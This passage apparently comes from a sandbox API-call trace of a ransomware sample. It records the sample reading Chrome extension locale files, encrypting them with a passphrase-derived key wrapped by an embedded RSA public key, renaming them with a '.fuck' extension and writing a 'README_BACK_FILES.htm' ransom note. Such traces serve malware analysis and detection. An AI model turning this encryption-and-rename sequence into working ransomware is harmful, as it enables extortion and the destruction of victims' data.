hKey=0x2e7e800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e757f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e757f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.800] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e757f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e757f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.800] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.808] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.808] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.810] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.811] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.811] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.811] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.811] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.811] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.812] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.812] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.812] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.812] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.812] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.812] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.812] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.813] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.813] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.813] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.813] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.813] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.813] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.814] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.814] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.814] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.814] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.814] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xdc, lpOverlapped=0x0) returned 1 [0263.814] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xdc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0263.814] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0263.814] CloseHandle (hObject=0x5d60) returned 1 [0263.814] CloseHandle (hObject=0x5d5c) returned 1 [0263.814] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), bFailIfExists=0) returned 1 [0263.817] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json", dwFileAttributes=0x0) returned 1 [0263.817] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg")) returned 1 [0263.818] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.fuck")) returned 1 [0263.819] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.819] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.819] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.819] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.819] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.820] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\readme_back_files.htm")) returned 0xffffffff [0263.820] AreFileApisANSI () returned 1 [0263.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.820] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.820] GetFileType (hFile=0x5d64) returned 0x1 [0263.821] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.825] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.825] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0263.825] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.825] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.826] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.826] GetLastError () returned 0x0 [0263.826] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0263.826] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0263.826] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.827] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.828] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.829] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.831] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.831] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.831] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.831] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.831] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.831] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.831] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75000) returned 1 [0263.832] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75000, dwCertEncodingType=0x1, pInfo=0x2eae530*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae560*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae568*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e2c0) returned 1 [0263.832] CryptEncrypt (in: hKey=0x2e7e2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.832] CryptEncrypt (in: hKey=0x2e7e2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74cd0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74cd0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.832] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e74cd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74cd0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.833] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 